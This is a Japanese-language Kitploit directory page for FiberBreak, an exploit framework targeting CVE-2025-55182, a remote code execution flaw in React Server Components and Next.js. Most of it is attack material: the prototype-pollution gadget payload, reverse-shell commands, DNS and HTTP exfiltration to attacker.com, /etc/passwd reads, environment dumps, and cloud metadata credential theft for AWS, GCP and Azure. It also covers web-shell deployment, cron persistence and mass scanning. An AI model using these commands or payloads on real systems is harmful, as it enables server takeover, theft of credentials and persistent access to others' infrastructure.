Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
FiberBreak — React2Shell エクスプロイトツール (CVE-2025-55182) | Kitploit
ツール/GitHubGitHub/scumfrog/fiberbreak
偵察脆弱性スキャナーエクスプロイトウェブアプリケーション悪用データ流出ポストエクスプロイトペネトレーションテストクラウドセキュリティコマンド&コントロールレッドチーミングペイロード開発
619ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
scumfrog/fiberbreak

FiberBreak

React2Shell エクスプロイトツール (CVE-2025-55182)

リポジトリを見る

FiberBreak

CVE-2025-55182 (React2Shell) のためのエクスプロイトフレームワーク - React Server Components の重大な RCE 脆弱性

概要

  • CVE: CVE-2025-55182
  • CVSS: 10.0 (重大)
  • タイプ: リモートコード実行 (RCE)
  • 影響を受けるバージョン: React 19.0.0-rc.0 から 19.0.0, Next.js 15.0.0 から 15.0.3
  • 発見者: Lachlan Miller (SonarSource)
  • 公開 PoC: maple3142

インストール

# Clone repository
git clone https://github.com/scumfrog/fiberbreak
cd fiberbreak

# Install dependencies
pip install -r requirements.txt

# Make executable
chmod +x fiberbreak.py

クイックスタート

# Build vulnerable testing environment
docker-compose up -d

# Wait for startup
sleep 20

# Test detection
./fiberbreak.py -u http://localhost:3000 detect

# Execute RCE
./fiberbreak.py -u http://localhost:3000 exploit -c "whoami"

# Verify
docker exec react2shell-lab ls -la /tmp/

技術的詳細

脆弱性の概要

CVE-2025-55182 は React Server Components (RSC) における重大なリモートコード実行脆弱性であり、認証されていない攻撃者がサーバー上で任意のコードを実行することを可能にします。

根本原因: React Flight プロトコルは、信頼できないクライアント入力を適切な検証なしで逆シリアル化するため、攻撃者が JavaScript のプロトタイプチェーンと Function コンストラクタを悪用する悪意のあるペイロードを作成できます。

攻撃ベクトル: 攻撃者は Next-Action ヘッダーを含む細工された multipart/form-data POST リクエストを任意の RSC エンドポイントに送信します。悪意のあるペイロードは以下を利用します。

  1. __proto__ アクセスによるプロトタイプ汚染
  2. constructor:constructor による Function コンストラクタの露出
  3. Promise 解決によるコード実行のトリガー

エクスプロイトの流れ

1. Attacker sends crafted POST request
   └─ multipart/form-data with malicious JSON
   └─ Next-Action header (any value)

2. Server deserializes payload
   └─ React processes RSC chunk format
   └─ Resolves Promise-like object

3. Gadget chain triggers
   └─ __proto__ access bypasses hasOwnProperty checks
   └─ constructor:constructor exposes Function()
   └─ _prefix executes arbitrary code

4. RCE achieved
   └─ Server executes attacker's JavaScript
   └─ Full system compromise

ガジェット

{
  "then": "$1:__proto__:then",           // Prototype pollution
  "status": "resolved_model",            // Fake React internal state
  "reason": -1,                          // Trigger resolution
  "value": '{"then":"$B1337"}',         // Blob reference
  "_response": {
    "_prefix": "MALICIOUS_CODE_HERE;",   // Executed code
    "_formData": {
      "get": "$1:constructor:constructor" // Function() access
    }
  }
}

影響を受けるコードパス

// react-server-dom-webpack/src/ReactFlightClient.js
function resolveModelChunk(chunk) {
  const value = JSON.parse(chunk.value);
  
  // Missing validation here allows malicious chunks
  if (value && typeof value.then === 'function') {
    // Attacker controls 'then' method
    value.then(/* ... */);
  }
}

使用方法

脆弱性検出

# Single target detection
./fiberbreak.py -u https://target.com detect

# Multiple targets from file
./fiberbreak.py -l targets.txt detect --threads 20

# Save results to JSON
./fiberbreak.py -l targets.txt detect -o results.json

# Disable SSL verification
./fiberbreak.py -u https://target.com detect --no-verify-ssl

基本エクスプロイト

# Simple blind command execution
./fiberbreak.py -u https://target.com exploit -c "whoami"

# Write file to disk
./fiberbreak.py -u https://target.com exploit \
  -c "/tmp/pwned.txt:HACKED" -t write_file

# Read file contents
./fiberbreak.py -u https://target.com exploit \
  -c "/etc/passwd:https://attacker.com" -t file_read

高度なエクスプロイト

# Reverse shell
./fiberbreak.py -u https://target.com exploit \
  -c "10.10.10.10:4444" -t reverse_shell

# DNS exfiltration (stealthy, no HTTP traffic)
./fiberbreak.py -u https://target.com exploit \
  -c "whoami:attacker.oastify.com" -t dns_exfil

# HTTP exfiltration with output
./fiberbreak.py -u https://target.com exploit \
  -c "id:https://attacker.com/exfil" -t http_exfil

# Environment variable dump
./fiberbreak.py -u https://target.com exploit \
  -c "https://attacker.com/env" -t env_dump

# System reconnaissance
./fiberbreak.py -u https://target.com exploit \
  -c "https://attacker.com/recon" -t recon

# Stealth DNS beacon (no command output)
./fiberbreak.py -u https://target.com exploit \
  -c "attacker.oastify.com" -t stealth_beacon

クラウドエクスプロイト

# Auto-detect cloud provider and extract credentials
# Supports: AWS, GCP, Azure, DigitalOcean, Oracle Cloud, Alibaba Cloud
./fiberbreak.py -u https://target.com exploit \
  -c "https://attacker.com/cloud" -t cloud_metadata

ペイロードタイプ

タイプフォーマット説明出力
simplecommand任意のシェルコマンドを実行ブラインド
outputcommand + --callbackHTTP コールバック付きで実行あり
reverse_shelllhost:lportBash リバースシェルインタラクティブ
dns_exfilcmd:domain または domainDNS 外部送信DNS ログ
http_exfilcmd:callback_urlHTTP 外部送信HTTP POST
file_readfilepath:callbackファイルを読み取り外部送信HTTP POST
write_filefilepath:contentファイルをディスクに書き込みブラインド
env_dumpcallback_url環境変数をダンプHTTP POST
cloud_metadatacallback_urlクラウド認証情報を抽出HTTP POST
reconcallback_urlシステム偵察HTTP POST
stealth_beacondomainDNS ビーコンDNS ログ
webshellfilepathNode.js ウェブシェルを展開ポート 8080
persistcallback_urlcron 永続化をインストールCron ジョブ

実際のシナリオ

バグバウンティハンティング

# 1. Stealthy detection with DNS beacon
./fiberbreak.py -u https://target.com exploit \
  -c "recon.yourburp.oastify.com" -t stealth_beacon

# 2. If vulnerable, extract sensitive data
./fiberbreak.py -u https://target.com exploit \
  -c "https://yourserver.com/exfil" -t env_dump

# 3. Check for cloud environment
./fiberbreak.py -u https://target.com exploit \
  -c "https://yourserver.com/cloud" -t cloud_metadata

# 4. Document findings without causing damage

ペネトレーションテスト

# Phase 1: Detection
./fiberbreak.py -u https://target.com detect -o detection.json

# Phase 2: Verification
./fiberbreak.py -u https://target.com exploit \
  -c "/tmp/pentest_proof.txt:PENTEST_$(date +%s)" -t write_file

# Phase 3: Impact Assessment
./fiberbreak.py -u https://target.com exploit \
  -c "https://pentest-server.com/impact" -t recon

# Phase 4: Credential Extraction (if cloud)
./fiberbreak.py -u https://target.com exploit \
  -c "https://pentest-server.com/creds" -t cloud_metadata

# Phase 5: Interactive Access (if authorized)
# Terminal 1: Start listener
nc -lvnp 4444

# Terminal 2: Get shell
./fiberbreak.py -u https://target.com exploit \
  -c "YOUR_IP:4444" -t reverse_shell

大量脆弱性スキャン

# Create target list
cat > targets.txt << EOF
https://app1.company.com
https://app2.company.com
https://app3.company.com
https://api.company.com
EOF

# Scan all targets in parallel
./fiberbreak.py -l targets.txt detect --threads 50 -o scan_results.json

# Filter vulnerable targets
cat scan_results.json | jq '.[] | select(.vulnerable==true) | .url'

# Generate report
cat scan_results.json | jq '{
  total: length,
  vulnerable: [.[] | select(.vulnerable==true)] | length,
  targets: [.[] | select(.vulnerable==true) | .url]
}'

クラウドインフラ評価

# AWS EC2 Instance
./fiberbreak.py -u https://aws-app.com exploit \
  -c "https://attacker.com/aws" -t cloud_metadata

# Callback receives:
# - Instance ID, region, availability zone
# - IAM role name
# - Temporary AWS credentials (AccessKeyId, SecretAccessKey, Token)
# - User data
# - Network configuration

# GCP Compute Engine
./fiberbreak.py -u https://gcp-app.com exploit \
  -c "https://attacker.com/gcp" -t cloud_metadata

# Callback receives:
# - Project ID, instance name, zone
# - Service account email
# - OAuth2 access token
# - Available scopes

# Azure Virtual Machine
./fiberbreak.py -u https://azure-app.com exploit \
  -c "https://attacker.com/azure" -t cloud_metadata

# Callback receives:
# - Instance metadata
# - Managed identity OAuth2 token
# - Subscription information

エクスプロイト技術

ツールをダウンロード